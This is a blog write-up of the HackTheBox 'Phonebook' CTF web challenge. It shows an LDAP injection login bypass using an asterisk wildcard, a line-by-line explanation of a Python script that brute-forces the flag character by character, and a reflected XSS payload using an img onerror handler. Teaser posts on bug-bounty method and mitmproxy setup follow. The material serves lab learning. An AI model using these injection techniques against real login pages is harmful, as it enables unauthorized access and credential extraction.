Skip to main content

Phonebook: HackTheBox Web challenge My Perspective

HackTheBox Playlist:

More CTF solutions:


GitHub - AdithyakrishnaV/CTFs

Contribute to AdithyakrishnaV/CTFs development by creating an account on GitHub.

github.com

First I looked for any cookie,then I thought it was an SQL injection:

Then I used FFuF but did’nt find anything interesting.Ffuf is a fest web fuzzer written in Go that allows typical directory discovery, virtual host discovery (without DNS records) and GET and POST parameter fuzzing.

Vulnerability:

I see that note from Reese stated that we can login using the workstation’s username and password. This gives us a hint that it is probably usingLDAP authentication.

Let,s test:

It is using LDAP authentication.

Then I searched for the user Reese. The results prove that the user exists.If I enter “ A* ” into the search filter, hoping that all names will appear.

So I tried with the username with an asterisk (*) as password.

This works.I think the flag may be the password so I tried this:

'username': 'Reese','password': 'HTB{*'

It works. So let’s construct a python code to bruteforce the flag:

You can find the code here:

Python-for-Penetration-Testing/HackTheBox/Phonebook at master ·…

You can’t perform that action at this time. You signed in with another tab or window. You signed out in another tab or…

github.com

  1. import requests: This imports the requests library, which allows Python to send HTTP requests using simple commands.
  2. import string: This imports the string module, which provides various string-related functions.
  3. ip = '161.35.36.167:30840': This defines a variable ip which holds the IP address and port of the target website.
  4. url = f'http://{ip}/login': This creates a string url which holds the URL of the login page of the target website.
  5. check = f'http://{ip}/': This creates a string check which holds the URL of the home page of the target website.
  6. alphabet = list(string.ascii_lowercase + string.digits + string.punctuation + string.whitespace): This creates a list alphabet which contains all lowercase letters, digits, punctuation marks and whitespace characters.
  7. alphabet.remove('*'): This removes the * character from the alphabet list.
  8. data = {'username': 'Reese', 'password': 'anything'}: This creates a dictionary data with two key-value pairs, where the username is Reese and the password is anything.
  9. result = 'HTB{': This initializes a string result to HTB{.
  10. flag = True: This sets a boolean variable flag to True.
  11. while flag:: This starts a while loop which runs as long as flag is True.
  12. for a in alphabet:: This starts a for loop which iterates over each character a in the alphabet list.
  13. data['password'] = result + a +'*': This sets the value of password in the data dictionary to a combination of resulta and *.
  14. res = requests.post(url, data=data).url: This sends a POST request to the login page of the target website with the data dictionary as the payload, and assigns the URL of the response to the res variable.
  15. if res == check:: This checks if the res variable is equal to the check variable.
  16. result += a: This appends the character a to the result variable.
  17. print(result): This prints the current value of the result variable.
  18. if a == '}': flag = False: This checks if the character a is equal to }, and sets the flag variable to False if it is.
  19. break: This exits the for loop and continues with the while loop.
  20. print(result): This prints the final value of the result variable

I also found an XSS Vulnerability:

http://183.163.135.60:45329/login?message=Authentication failed

What ever is in the message is written on the page:

But it blocks script tag so in used an image tag, payload:

<img src=x onerror=alert(‘Adi’)> , and it worked.

Owned Phonebook from Hack The Box!

I have just owned challenge Phonebook from Hack The Box

www.hackthebox.com

Labels

Labels:

Comments

Post a Comment

Popular posts from this blog

Bug Boundy Methodology, Tools & Resources

Start by defining a clear objective, such as exploiting a remote code execution (RCE) vulnerability or bypassing authentication on your target. Then, consider how you can achieve this goal using various attack vectors like XSS, SSRF, or others - these are simply tools to help you reach your objective. Use the target as how a normal user would, while browsing keep these questions in mind: 1)How does the app pass data? 2)How/where does the app talk about users? 3)Does the app have multi-tenancy or user levels? 4)Does the app have a unique threat model? 5)Has there been past security research & vulnerabilities? 6)How does the app handle XSS, CSRF, and code injection?
Post a Comment
Read more

Install & set up mitmweb or mitmproxy in Linux

Step 1: Go to the mitmproxy page and download the binaries. Step 2: Install the downloaded tar file with the command " tar -xzf <filename>.tar.gz " Step 3: In the FoxyProxy add the proxy 127.0.0.1:8080  and turn it on. Step 4 : In the terminal run command " ./mitmweb " Step 5: Go to the page  http://mitm.it/   and download the mitmproxy's Certificate. Step 6: If you downloaded the certificate for Firefox, then go to " settings -> Privacy & Security -> Click View Certificates -> Click  Import ", then import the certificate.  Step 7: Now you are ready to capture the web traffic. Step 8 : In terminal run " ./mitmweb"
Post a Comment
Read more

Making CHIP-8 emulator in C

  Chip8 doc link | Components | Opcode Table GitHub - AdithyakrishnaV/Chip8_Emulator--Interpreter Contribute to AdithyakrishnaV/Chip8_Emulator--Interpreter development by creating an account on GitHub. github.com CHIP-8 programs are binary files, and your emulator must read them and operate on the bytes. You will also need a way to draw graphics to the screen and read keypresses. Many graphical libraries can do this for you or use something like SDL directly. CHIP-8 components Display 64 pixels wide and 32 pixels tall. Each pixel is a boolean value, or a bit; can be on or off (“off” pixel was just black, and “on” was white). We’ll use SDL for rendering: SDL initialization Not initialize:- returns -1  Error message is stored in SDL_GetError Initializing SDL if (SDL_Init(SDL_INIT_VIDEO)!= 0 ){ printf ( "SDL not initialized,%s\n" , SDL_GetError); exit (- 1 ); } Initialize display SDL_Window * window = SDL_CreateWindow ( "chip8" , SDL_WINDOWPOS_CENTERED , SDL_...
Post a Comment
Read more